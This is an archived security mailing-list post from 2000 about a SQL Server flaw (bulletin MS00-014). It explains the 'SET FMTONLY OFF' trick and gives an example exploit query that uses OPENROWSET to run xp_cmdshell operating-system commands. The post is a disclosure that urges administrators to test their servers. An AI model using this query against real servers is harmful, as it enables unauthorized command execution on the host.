|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: SQL Server Vulnerability details
From: Chip Andrews (chipandrews
USA.NET)Date: Sat Mar 18 2000 - 16:40:48 CST
- Next message: Schoedel, Christine: "Re: IE and Outlook 5.x allow executing arbitrary programs using . eml files"
- Previous message: Chris Paget: "Re: Enumerate Root Web Server Directory Vulnerability for IIS 4.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Due to the apparent blackout of information about the "SQL Query Abuse"
advisory http://www.microsoft.com/technet/security/bulletin/ms00-014.asp I
wanted to point any interested parties to an English description of the
vulnerability by Sven Hammesfahr. The detailed description is on his
website at
http://itrain.de/sql/knowhow/security/openrowsete.htm
Also, the "little trick" he refers to is in my opinion the addition of SET
FMTONLY OFF before the execute statement to keep the query from returning
metadata only. An example exploit would be:
SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data
Source=myserver','SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')
Test your servers ASAP to keep from becoming a statistic...
-----------------------------------------
Chip Andrews, MCSE+I, MCSD
http://www.sqlsecurity.com
http://www.eexams.com
------------------------------------------
- Next message: Schoedel, Christine: "Re: IE and Outlook 5.x allow executing arbitrary programs using . eml files"
- Previous message: Chris Paget: "Re: Enumerate Root Web Server Directory Vulnerability for IIS 4.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]